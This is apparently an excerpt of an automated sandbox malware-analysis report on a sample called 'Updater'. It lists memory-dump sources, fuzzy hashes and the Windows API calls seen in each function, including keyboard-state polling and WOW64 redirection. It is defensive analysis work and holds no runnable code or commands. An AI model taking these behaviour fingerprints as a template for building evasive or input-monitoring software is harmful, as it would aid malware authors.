                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 92928b79464f717f08cb06dca36da127a5841f7f9e7883d295650ba60f9a0f59
                                                                                                                                                    • Instruction ID: e80dcd04dd29253121cf058a986878f43bd99067f1fa7ee2469cbbe33670600f
                                                                                                                                                    • Opcode Fuzzy Hash: 92928b79464f717f08cb06dca36da127a5841f7f9e7883d295650ba60f9a0f59
                                                                                                                                                    • Instruction Fuzzy Hash: C9519471E00114AFDB10DF68C884B697BE5FF85364F1985E8E8689B391C771EE42DB90
                                                                                                                                                    APIs
                                                                                                                                                    • CharLowerBuffW.USER32(?,?), ref: 00B9016F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharLower
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2358735015-0
                                                                                                                                                    • Opcode ID: 36ae167f14954d2b5a9061c7378b9031645e204774c870315acf98fd455f38f0
                                                                                                                                                    • Instruction ID: 491caec133c9352a33b785e7e19ce902a2e5512f36a9b658f4674df6ad7f2001
                                                                                                                                                    • Opcode Fuzzy Hash: 36ae167f14954d2b5a9061c7378b9031645e204774c870315acf98fd455f38f0
                                                                                                                                                    • Instruction Fuzzy Hash: 7641B176910209AFDF15EFA4D8809AEB7F9FF44310B1085BEE91697251EB70DE04CB50
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: EnumWindows
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1129996299-0
                                                                                                                                                    • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                    • Instruction ID: 170c5ba5c4dc1fc9145291f16be3baebbcadf2c4b771f15632659efc3f9f8a47
                                                                                                                                                    • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                    • Instruction Fuzzy Hash: 8931E2B0A10105DBC718EF58C484A6DFBF6FB49304B2486E5E609CB256E731EEC1EB84
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 00B3290F: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B327DC,?,?,00B3058E,?,00000001), ref: 00B3291B
                                                                                                                                                      • Part of subcall function 00B3290F: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00B3292D
                                                                                                                                                      • Part of subcall function 00B3290F: FreeLibrary.KERNEL32(00000000,?,?,00B327DC,?,?,00B3058E,?,00000001), ref: 00B3293F
                                                                                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00B3058E,?,00000001), ref: 00B327FC
                                                                                                                                                      • Part of subcall function 00B328D8: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00B777B4,?,?,00B3058E,?,00000001), ref: 00B328E1
                                                                                                                                                      • Part of subcall function 00B328D8: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00B328F3
                                                                                                                                                      • Part of subcall function 00B328D8: FreeLibrary.KERNEL32(00000000,?,?,00B777B4,?,?,00B3058E,?,00000001), ref: 00B32906
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Library$Load$AddressFreeProc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2632591731-0
                                                                                                                                                    • Opcode ID: df02180e726bdde9caae61b66103b4054116374e854da840bfb197a10209e4fd
                                                                                                                                                    • Instruction ID: f4b719642d4f80ebfc9034f904c06fc3b4f8417c581adba43e41c9f524805b68
                                                                                                                                                    • Opcode Fuzzy Hash: df02180e726bdde9caae61b66103b4054116374e854da840bfb197a10209e4fd
                                                                                                                                                    • Instruction Fuzzy Hash: 63112336640205ABDB24BF24CC02BAD77E4DF40710F3084AEF942A71C2EE709E059B60
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: CountTick
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 536389180-0
                                                                                                                                                    • Opcode ID: 9996e9769e45e74bdcabb9258bbdbd09714d6ff46f869f59518d5b63c0d4a482
                                                                                                                                                    • Instruction ID: e0068ccbd7ad3d448e81646a4fd5e515a14149b2dc82cdfc66a69a29369f861e
                                                                                                                                                    • Opcode Fuzzy Hash: 9996e9769e45e74bdcabb9258bbdbd09714d6ff46f869f59518d5b63c0d4a482
                                                                                                                                                    • Instruction Fuzzy Hash: E711EFB4A04209AFCB05DF9AD8818AEBBB8FB48714B55946AE914A7350D734AE11CB90
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wsopen_s
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3347428461-0
                                                                                                                                                    • Opcode ID: 68dc45ef3a98d18dbdefb7ed7f86b59e883557549a6cbb3c56a76be62ad2f85a
                                                                                                                                                    • Instruction ID: 2f4ba7efb7eb6761e573a0f05aa3331b2962e1004d174e2d8d1016c73ba83140
                                                                                                                                                    • Opcode Fuzzy Hash: 68dc45ef3a98d18dbdefb7ed7f86b59e883557549a6cbb3c56a76be62ad2f85a
                                                                                                                                                    • Instruction Fuzzy Hash: 5C111875A0420AAFCB15DF58E941A9A7BF4EF48311F104499FC09AB311DA31EA25CBA5
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: b2009a02d5f339f5257c59c963c83ace43b5680a0de814ef047c30addbb01e52
                                                                                                                                                    • Instruction ID: 70be5719e4149f357a08247dde23c4bfe53615182a522210ead0f2568b9350ec
                                                                                                                                                    • Opcode Fuzzy Hash: b2009a02d5f339f5257c59c963c83ace43b5680a0de814ef047c30addbb01e52
                                                                                                                                                    • Instruction Fuzzy Hash: 35F028329016105AD6313B29DC05B5B33D8AF52335F100BD5FD34972D2EF70EE09A6A1
                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(00000000,?,00000001,?,00B40445,?,?,00B2FA72,00000000,?,?,?,00B21188,?), ref: 00B52860
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1279760036-0
                                                                                                                                                    • Opcode ID: 656be4e960a0881dfa5af732de594eb24f9b0380b06925f2a1270691e57e67ef
                                                                                                                                                    • Instruction ID: 9924d59ad97b2d7975327407c14e2d6754b58d91b257ce476a025a6c2eb332c9
                                                                                                                                                    • Opcode Fuzzy Hash: 656be4e960a0881dfa5af732de594eb24f9b0380b06925f2a1270691e57e67ef
                                                                                                                                                    • Instruction Fuzzy Hash: 44E0ED3224262167EA2137EA9C04B6B3AC8EF033A2F1901F0BC01A31A1EB60DD0681E0
                                                                                                                                                    APIs
                                                                                                                                                    • LoadStringA.USER32(00000000,00010000,?,00001000), ref: 013F34BB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LoadString
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2948472770-0
                                                                                                                                                    • Opcode ID: 98cb9e290b6fcda0473899373f779afeb580b28c0de553bc535e0dfee71ead7e
                                                                                                                                                    • Instruction ID: 74d9f7cbb2d12772aa4f1c3dabebcb4765087790ce8fff30d5a5a1bc475f0895
                                                                                                                                                    • Opcode Fuzzy Hash: 98cb9e290b6fcda0473899373f779afeb580b28c0de553bc535e0dfee71ead7e
                                                                                                                                                    • Instruction Fuzzy Hash: 5CF0A075300611DBCB01DA9CDCC0F5636DC5B08288B048069B74CDB348EB60CC4487A2
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: d86ecfe8ec7a6260f81e3f30b4e6d507c82ac73b91558118a3ab2c75f158dd15
                                                                                                                                                    • Instruction ID: 270e8db0f398a18ea7c5d081621039128a3ba4099762f23125590e5586816550
                                                                                                                                                    • Opcode Fuzzy Hash: d86ecfe8ec7a6260f81e3f30b4e6d507c82ac73b91558118a3ab2c75f158dd15
                                                                                                                                                    • Instruction Fuzzy Hash: 5CF03071545701CFCB349F65D494816B7E5FF1432932089BEE1DA83510D7359840DF90
                                                                                                                                                    APIs
                                                                                                                                                    • _free.LIBCMT ref: 00B54BC8
                                                                                                                                                      • Part of subcall function 00B527F4: RtlFreeHeap.NTDLL(00000000,00000000,?,00B2FC79,?,?,00B2111E), ref: 00B5280A
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap_free
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3249267023-0
                                                                                                                                                    • Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                                                                                                    • Instruction ID: 188b0cb000d64494a5201dc179e195a1b31c9ac55b72e3fcdb7dfadb1a65ccf0
                                                                                                                                                    • Opcode Fuzzy Hash: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
                                                                                                                                                    • Instruction Fuzzy Hash: 25E0923A1053059F8720CF6CE500B82B7E4EF893657208569ED9DD3210D731F856CB80
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ClearVariant
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1473721057-0
                                                                                                                                                    • Opcode ID: 811c93b133af9f420f8247a613b49f28192e18d034e385fcfb6815f4dd148bb1
                                                                                                                                                    • Instruction ID: 094d2b3f38b91bf06da200ada5503580c585965656b8f2cb2038c87732e6596b
                                                                                                                                                    • Opcode Fuzzy Hash: 811c93b133af9f420f8247a613b49f28192e18d034e385fcfb6815f4dd148bb1
                                                                                                                                                    • Instruction Fuzzy Hash: 07F022717582865AEB309BA4EC84B32FBD4EB00311F1005FADAD9826C1EBBD54A0B761
                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __fread_nolock
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2638373210-0
                                                                                                                                                    • Opcode ID: 5aa6600b3c90dabe8e751dc9537f39b12223877b02cec01d2e468d945b000684
                                                                                                                                                    • Instruction ID: 19729ca66167fcb33f7f9b1ff0dd9c130949bdd0d470e0eceb7e3bd6d1ba7764
                                                                                                                                                    • Opcode Fuzzy Hash: 5aa6600b3c90dabe8e751dc9537f39b12223877b02cec01d2e468d945b000684
                                                                                                                                                    • Instruction Fuzzy Hash: 15F0DA7140420DFBDF05CF94C941AAA7BA9FB14314F208589F9144A112D732DA61AB91
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleFileNameA.KERNEL32(00B20000,?,00000105), ref: 013F2947
                                                                                                                                                      • Part of subcall function 013F2BBD: GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 013F2BD8
                                                                                                                                                      • Part of subcall function 013F2BBD: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 013F2BF6
                                                                                                                                                      • Part of subcall function 013F2BBD: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 013F2C14
                                                                                                                                                      • Part of subcall function 013F2BBD: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 013F2C32
                                                                                                                                                      • Part of subcall function 013F2BBD: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,00000000,00000005,00000000,013F2CC1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 013F2C7B
                                                                                                                                                      • Part of subcall function 013F2BBD: RegQueryValueExA.ADVAPI32(?,013F2E3D,00000000,00000000,00000000,00000005,?,?,00000000,00000000,00000000,00000005,00000000,013F2CC1,?,80000001), ref: 013F2C99
                                                                                                                                                      • Part of subcall function 013F2BBD: RegCloseKey.ADVAPI32(?,013F2CC8,00000000,00000000,00000005,00000000,013F2CC1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 013F2CBB
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2796650324-0
                                                                                                                                                    • Opcode ID: 4f6f7f1076de1bd117e32dae873e78de734a710e1bc72a608b831ebaeac8ce49
                                                                                                                                                    • Instruction ID: d2a97f832bd86ccd84e9cf8aec043da2cff00d6a0ea38fe08a96440e9c466182
                                                                                                                                                    • Opcode Fuzzy Hash: 4f6f7f1076de1bd117e32dae873e78de734a710e1bc72a608b831ebaeac8ce49
                                                                                                                                                    • Instruction Fuzzy Hash: BFE06D71A00314CBCB54DE9CD8C0A5337D8AB08758F0049A5AE94DF346D370D92087D0
                                                                                                                                                    APIs
                                                                                                                                                    • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00B3FDD8
                                                                                                                                                      • Part of subcall function 00B2F82C: _wcslen.LIBCMT ref: 00B2F83F
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LongNamePath_wcslen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 541455249-0
                                                                                                                                                    • Opcode ID: 4ea262d60858196cf455d54377044f72f979151aee495314b1f3ff23ef4442b7
                                                                                                                                                    • Instruction ID: 10ff30c21bc221ee91e0a90c43d97bb0b8a1832f7de96910416d19803b3e1f92
                                                                                                                                                    • Opcode Fuzzy Hash: 4ea262d60858196cf455d54377044f72f979151aee495314b1f3ff23ef4442b7
                                                                                                                                                    • Instruction Fuzzy Hash: 87E086369002285BC72096989C05FFAB7EDDB897A0F0401F6FD0CD7208D9A5AC808691
                                                                                                                                                    APIs
                                                                                                                                                    • GetForegroundWindow.USER32 ref: 00B33AA9
                                                                                                                                                      • Part of subcall function 00B34E5A: GetWindowLongW.USER32(00000000,000000EB), ref: 00B34E6B
                                                                                                                                                      • Part of subcall function 00B34B74: GetCursorPos.USER32(?), ref: 00B34B88
                                                                                                                                                      • Part of subcall function 00B34B74: ScreenToClient.USER32(00000000,?), ref: 00B34BA5
                                                                                                                                                      • Part of subcall function 00B34B74: GetAsyncKeyState.USER32(00000001), ref: 00B34BCE
                                                                                                                                                      • Part of subcall function 00B34B74: GetAsyncKeyState.USER32(00000002), ref: 00B34BE8
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                                    • Associated: 00000023.00000002.2227196391.0000000000B20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BBD000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227311915.0000000000BE1000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227356140.0000000000BED000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    • Associated: 00000023.00000002.2227476052.0000000000BF5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_b20000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AsyncStateWindow$ClientCursorForegroundLongScreen
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 4074248120-0
                                                                                                                                                    • Opcode ID: 270f118a6064455026b0235452b1d81090926199dbef6fb586c6c33961895c69
                                                                                                                                                    • Instruction ID: d8b1709cab0c45c18a790faebfa50a6eb4bc406b5cd10e39c352e4c45d65b873
                                                                                                                                                    • Opcode Fuzzy Hash: 270f118a6064455026b0235452b1d81090926199dbef6fb586c6c33961895c69
                                                                                                                                                    • Instruction Fuzzy Hash: 83D0A7313001244FC614AB189805E6E37D1FF45B30F2403D0F0558B2F5CF609D56C6C1
                                                                                                                                                    APIs
                                                                                                                                                    • GetFileAttributesA.KERNEL32(00000000,?,01406D2F,00000000,0140913F,014092E5,?,c:\,014092E5,?,c:\), ref: 013F5138
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227830347.00000000013EB000.00000040.00000020.00020000.00000000.sdmp, Offset: 013EB000, based on PE: false
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_35_2_13eb000_Updater.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AttributesFile
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3188754299-0
                                                                                                                                                    • Opcode ID: 4572904268e265fd193fcb2e56680a69fd8facc4a158caf36c05ddde75ad2af6
                                                                                                                                                    • Instruction ID: 1830a9555ab35704dced587d2ec158adc90ce6822c1c36e85ef60dfbeec0a652
                                                                                                                                                    • Opcode Fuzzy Hash: 4572904268e265fd193fcb2e56680a69fd8facc4a158caf36c05ddde75ad2af6
                                                                                                                                                    • Instruction Fuzzy Hash: 67C08CA03022040AEE5061BC1CC0A8A028C4B2A03E7212B29E339D21D2E211A4122010
                                                                                                                                                    APIs
                                                                                                                                                    • CreateFileW.KERNELBASE(00000000,00000000,?,00B6062E,?,?,00000000,?,00B6062E,00000000,0000000C), ref: 00B602E1
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000023.00000002.2227213581.0000000000B21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00B20000, based on PE: true
